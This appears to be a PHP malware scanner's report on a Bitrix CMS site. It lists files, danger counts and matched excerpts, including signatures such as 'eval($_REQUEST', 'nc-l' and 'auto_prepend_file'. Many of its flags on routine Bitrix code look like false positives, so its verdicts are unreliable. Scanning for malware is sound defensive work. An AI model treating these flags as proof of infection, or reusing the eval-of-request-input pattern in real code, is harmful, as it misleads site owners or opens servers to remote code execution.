/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paymaster/payment.php Size: 272.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paymaster/result_rec.php Size: 278.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paymaster/ru/webmoney_web.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/mcsecure/.description.php Size: 280.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/mcsecure/en/payment.php Size: 201.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/mcsecure/payment.php Size: 270.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/mcsecure/ru/payment.php Size: 201.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paycash/.description.php Size: 278.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paycash/en/paycash.php Size: 199.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paycash/payment.php Size: 268.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paycash/ru/paycash.php Size: 199.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_de/.description.php Size: 281.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_de/en/bill.php Size: 193.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_de/payment.php Size: 275.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_de/ru/bill.php Size: 194.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/ru/payment/yandex_3x/ru/payment.php Size: 3.15 kB Created: 2023-03-11 16:37:34 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function eval Line: 49 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+result+')' );
BX('https_check_result').innerHTML = ' ' + res['text'];
BX.removeClass(BX('https_check_result'), 'https_check_success');
BX.removeClass(BX('https_check_result'), 'https_check_fail');
if (res['status'] == 'ok')
BX.addClass(BX('https_check_result'), 'https_check_success');
else
BX.addClass(BX('https_check_result'), 'https_check_fail');
});
};
checkHTTPS()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/discount_preset_list.php Size: 11.20 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 31 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*close*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/basket_admin.php Size: 21.62 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+result+')' ),
params = res['params'];
if (params["id"])
BX('filter_product_id').value = params["id"];
if (params["name"])
{
el = BX("product_name_alt");
if(el)
el.innerHTML = params["name"];
}
}
function showProductSearchDialog()
{
var popup = makeProductSearchDialog({
caller: 'basket_admin',
lang: '<?=LANGUAGE_ID?>',
callback: 'getProductData'
});
popup.Show();
}
function makeProductSearchDialog(pa...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/order_new.php Size: 274.83 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+res+')' );
if (rss["status"] == "ok")
{
BX('CART_FIX').value= 'N';
var userEl = BX("user_id");
var orderID = '<?=$ID?>';
locationID = rss["location_id"];
locationZipID = rss["location_zip_id"];
insertHtmlResult(document.getElementById("buyer_type_change"), rss['buyertype']);
insertHtmlResult(document.getElementById("buyer_type_delivery"), rss['buyerdelivery']);
<?if(CSaleLocation::isLocationProEnabled()):?>
initZipHandling();
<?endif?...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/affiliate_calc.php Size: 13.38 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/ymarket.php Size: 22.25 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+result+')' );
BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>').innerHTML = ' ' + res['text'];
BX.removeClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_success');
BX.removeClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_fail');
if (res['status'] == 'ok')
BX.addClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_success');
else
BX.addClas...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/report_construct.php Size: 22.90 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('('+res+')');
filters = BX.findChildren(filterContainer, {class: 'sale-report-site-dependent'}, true);
for(i in filters)
{
if (filters[i].tagName == 'SELECT')
{
filterType = filters[i].getAttribute('tid');
if (filterType)
{
fRewriteSelectFromArray(filters[i], res[filterType], '');
}
filters[i].value = '';
}
}
}
}
function ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/crm.php Size: 22.64 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/stat_graph_money.php Size: 10.14 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 121 Warning Double var technique is usually used for the obfuscation of malicious code |
${$filterLine}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/1c_admin_profile.php Size: 16.50 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var cur_type = ''; if (typeof(param_" + pkey + "_type_" + ind + ") == 'string') cur_type = param_" + pkey + "_type_" + ind + ";");
eval("var cur_val = ''; if (typeof(param_" + pkey + "_value_" + ind + ") == 'string') cur_val = param_" + pkey + "_value_" + ind + ";");
eval("var cur_name = ''; if (typeof(param_" + pkey + "_name_" + ind + ") == 'string') cur_name = param_" + pkey + "_name_" + ind + ";");
if(cur_name.length > 0)
{
num = pkey.substr(pkey.lastIndexOf('_')+1);
src = BX("...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/delivery.php Size: 11.67 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("document.find_form.filter_lang");
filter_order_price_from = eval("document.find_form.filter_order_price_from");
filter_order_price_to = eval("document.find_form.filter_order_price_to");
f_currency = eval("document.find_form.f_currency");
var i, esum;
if (parseInt(filter_lang.selectedIndex)==0)
{
filter_order_price_from.disabled = true;
filter_order_price_to.disabled = true;
f_currency.value = "";
}
else
{
filter_order_price_from.disa...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/order_detail.php Size: 153.23 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 1363 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$customOrderView)
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+res+')' );
BX.closeWait();
if (!!rs.STATUS_ERR && true == rs.STATUS_ERR)
{
var obStatusErr = BX('change_status_err');
if (!!obStatusErr)
{
obStatusErr.innerHTML = rs.STATUS_ERR_MESS;
obStatusErr.style.display = 'inline-block';
}
}
else
{
if (BX('date_status_change') && rs['DATE_STATUS'] && rs['DATE_STATUS'].length > 0)
...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/discount_edit.php Size: 28.93 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/buyers.php Size: 17.29 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 331 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*BUYER*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/report_view.php Size: 23.09 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('('+res+')');
filters = BX.findChildren(filterContainer, {class: 'sale-report-site-dependent'}, true);
for(i in filters)
{
if (filters[i].tagName == 'SELECT')
{
filterType = filters[i].getAttribute('tid');
if (filterType)
{
fRewriteSelectFromArray(filters[i], res[filterType], '');
}
}
}
}
}
function fRewriteSelectFromArray(select, dat...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/location_edit.php Size: 21.15 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("document.fform.COUNTRY_ID");
CHANGE_COUNTRY = eval("document.fform.CHANGE_COUNTRY");
<?if ($ID>0):?>
if (parseInt(COUNTRY_LIST.selectedIndex)==0)
{
CHANGE_COUNTRY.checked = false;
}
<?endif;?>
if (parseInt(COUNTRY_LIST.selectedIndex)==0 <?if ($ID>0) echo "|| CHANGE_COUNTRY.checked";?>)
{
SetEnabled(true);
}
else
{
SetEnabled(false);
}
}
</script>
<select name="COUNTRY_ID" OnChange="SetContact()">
<option value="...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/yandexinvoice_settings.php Size: 8.78 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 2
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process); $dbRes = \Bitrix\Sale\Internals\YandexSettingsTable::getById($shopId); if ($dbRes->fetch()) \Bitrix\Sale\Internals\YandexSettingsTable::update($shopId, array('PKEY' => $privateKey)); else \Bitrix\Sale\Internals\YandexSettingsTable::add(array('SHOP_ID' => $shopId, 'PKEY' => $privateKey)); } else { $errorMsg = Loc::getMessage('SALE_YANDEX_INVOICE_SETTINGS_ALREADY_CONFIGURED'); } if ($errorMsg === '') LocalRedirect($APPLICATION->GetCurPage()."?pay_system_id=".$id."&lang=".LANG...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($command, $descriptorSpec, $pipes); $privateKey = stream_get_contents($pipes[1]); $return_value = proc_close($process); $dbRes = \Bitrix\Sale\Internals\YandexSettingsTable::getById($shopId); if ($dbRes->fetch()) \Bitrix\Sale\Internals\YandexSettingsTable::update($shopId, array('PKEY' => $privateKey)); else \Bitrix\Sale\Internals\YandexSettingsTable::add(array('SHOP_ID' => $shopId, 'PKEY' => $privateKey)); } else { $errorMsg = Loc::getMessage('SALE_YANDEX_INVOICE_SETTINGS_ALREADY_CONFIG...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/admin/affiliate_plan_edit.php Size: 23.97 kB Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("document.form1.MODULE_ID_" + cnt);
if (!m)
return;
if (m[m.selectedIndex].value == "catalog")
ShowHideSectionBox(cnt, true);
else
ShowHideSectionBox(cnt, false);
}
var itm_id = new Object();
var itm_name = new Object();
function ChlistIBlock(cnt, n_id)
{
var max_lev = itm_lev;
var nex = document.form1["SECTION_SELECTOR_LEVEL_" + cnt + "[0]"];
var iBlock = eval("document.form1.SECTION_IBLOCK_ID_" + cnt);
var iBlockID = iBlock[iBl...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/include.php Size: 54.59 kB Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.location.import/templates/.default/template.php Size: 15.64 kB Created: 2023-03-11 16:38:04 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 11 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.location.import/templates/admin/template.php Size: 12.30 kB Created: 2023-03-11 16:38:04 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 11 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.notice.product/templates/.default/template.php Size: 7.41 kB Created: 2023-03-11 16:38:11 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function eval Line: 130 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+res+')' );
if (rs['ERRORS'].length > 0)
{
if (rs['ERRORS'] == 'NOTIFY_ERR_NULL')
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_NULL')?>';
else if (rs['ERRORS'] == 'NOTIFY_ERR_CAPTHA')
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_CAPTHA')?>';
else if (rs['ERRORS'] == 'NOTIFY_ERR_MAIL_EXIST')
{
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_MAIL_BUYERS_EXIST')?>';
...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.basket.basket/templates/.default/template.php Size: 8.29 kB Created: 2023-03-11 16:38:00 Modified: 2023-11-27 14:53:28 Dangers: 4
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.basket.order.ajax/component.php Size: 38.77 kB Created: 2023-03-11 16:38:09 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 556 Dangerous Malware Signature (hash: 11413268) |
eVal($_POST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.basket.order.ajax/templates/.default/template.php Size: 5.78 kB Created: 2023-03-11 16:38:09 Modified: 2023-11-27 14:53:28 Dangers: 7
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.order.full/templates/.default/template.php Size: 5.19 kB Created: 2023-03-11 16:37:56 Modified: 2023-11-27 14:53:29 Dangers: 7
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.location.selector.system/templates/.default/template.php Size: 17.63 kB Created: 2023-03-11 16:38:04 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(<?=CUtil::PhpToJSObject(array( 'scope' => 'slss-'.intval($arResult['RANDOM_TAG']), 'source' => $component->getPath().'/get.php', 'query' => array( 'BEHAVIOUR' => array( 'LANGUAGE_ID' => LANGUAGE_ID ), ), 'editUrl' => '?'.implode('&', $urlComponents), 'parentTagId' => intval($arResult['RANDOM_TAG']), 'useCodes' => $arResult['USE_CODES'], 'types' => $arResult['TYPES'], 'startSearchLen' => $component::START_SEARCH_LEN, 'pageSize' => $component::PAGE_SIZE, 'hugeTailLen' => $component::HUGE_TA...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.ajax.delivery.calculator/templates/.default/ajax.php Size: 0.99 kB Created: 2023-03-11 16:38:01 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 15 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/components/bitrix/sale.ajax.delivery.calculator/templates/input/ajax.php Size: 864.00 B Created: 2023-03-11 16:38:01 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 15 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/install/sample/mp3/download_private.php Size: 4.94 kB Created: 2023-03-11 16:38:15 Modified: 2023-11-27 14:53:29 Warns: 1 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/lib/internals/controller.php Size: 9.87 kB Created: 2023-03-11 16:40:15 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 46 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_after.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { try { if($this->request->isPost()) { \CUtil::jSPostUnescape(); $this->request->addFilter(new PostDecodeFilter); } $this->resolveAction(); $this->checkAction(); $this->checkRequiredModules(); if(!$this->prepareParams()) { $this->sendJsonErrorResponse(); } if($this->processBeforeAction($this->getAction()) !== false) { $this->runAction(); } } catch(\Exception $e) { $this->runProcessingException($e); } } protected function getUser() { global $USER; return $USER; } protected function sendJso...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_edit.php Size: 1.39 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_view.php Size: 1.92 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_bizproc_workflow_edit.php Size: 1.68 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_bizproc_workflow_admin.php Size: 2.94 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_element_edit.php Size: 1.99 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_bizproc_workflow_start.php Size: 1.38 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_sections.php Size: 1.44 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_lists.php Size: 1.35 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_bizproc_task.php Size: 1.53 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_fields.php Size: 1.45 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_list_field_edit.php Size: 1.51 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/socnet/group_bizproc_log.php Size: 1.33 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/install/components/bitrix/lists.element.edit/component.php Size: 31.11 kB Created: 2023-03-11 16:40:17 Modified: 2023-11-27 14:53:26 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 500 Dangerous Malware Signature (hash: 11413268) |
eval($_POST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/lists/install/components/bitrix/lists.export.excel/class.php Size: 17.74 kB Created: 2023-03-11 16:40:17 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/user.php Size: 7.37 kB Created: 2023-03-11 16:38:43 Modified: 2023-11-27 14:53:29 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 197 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "<?include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")
| Exploit execution Line: 197 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/iprule.php Size: 29.94 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:29 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/system_information.php Size: 6.64 kB Created: 2023-03-11 16:38:43 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/event.php Size: 5.49 kB Created: 2023-03-11 16:38:43 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($this->syslogPriority, $message); } if ($this->isFileEngineActive) { if (!$message) $message = $this->messageFormatter->format($auditType, $itemName, $itemDescription); $message = static::sanitizeMessage($message); $message .= "\n"; $savedInFile = file_put_contents($this->filePath, $message, FILE_APPEND) > 0; } return ($savedInDB || $savedInSyslog || $savedInFile); } public static function getSyslogPriorities() { return static::$syslogPriorities; } public static function getSyslogFaciliti...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/post_filter.php Size: 6.95 kB Created: 2023-03-11 16:38:43 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 167 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "\n------------------------------\n\$_SERVER:\n")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/classes/general/antivirus.php Size: 43.78 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 517 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "\n------------------------------\n\$_SERVER:\n")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/install/index.php Size: 10.88 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/lang/en/classes/general/tests/environment.php Size: 3.78 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 7 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/lang/en/classes/general/tests/php_configuration.php Size: 3.91 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 25 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/lang/en/admin/security_antivirus.php Size: 2.24 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 13 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/lang/ua/admin/security_antivirus.php Size: 3.02 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 12 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/security/lang/ru/admin/security_antivirus.php Size: 3.09 kB Created: 2023-03-11 16:38:44 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 12 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/options.php Size: 59.44 kB Created: 2023-03-11 16:40:13 Modified: 2023-11-27 14:53:30 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 396 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_group/include/webdav.php Size: 25.02 kB Created: 2023-03-11 16:39:58 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_group/include/webdav_settings.php Size: 12.94 kB Created: 2023-03-11 16:39:58 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_group/templates/.default/bitrix/search.page/tags_icons/result_modifier.php Size: 16.66 kB Created: 2023-03-11 16:40:00 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork/include/webdav.php Size: 22.12 kB Created: 2023-03-11 16:39:48 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork/include/webdav_settings.php Size: 11.37 kB Created: 2023-03-11 16:39:48 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork/templates/.default/bitrix/search.page/tags_icons/result_modifier.php Size: 16.66 kB Created: 2023-03-11 16:39:46 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork/templates/.default/bitrix/search.page/tags_icons_user/result_modifier.php Size: 16.12 kB Created: 2023-03-11 16:39:46 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_user/include/webdav.php Size: 25.44 kB Created: 2023-03-11 16:39:49 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_user/include/webdav_settings.php Size: 13.03 kB Created: 2023-03-11 16:39:49 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/components/bitrix/socialnetwork_user/templates/.default/bitrix/search.page/tags_icons_user/result_modifier.php Size: 16.12 kB Created: 2023-03-11 16:39:50 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialnetwork/install/index.php Size: 40.19 kB Created: 2023-03-11 16:40:11 Modified: 2023-11-27 14:53:30 Dangers: 2
|
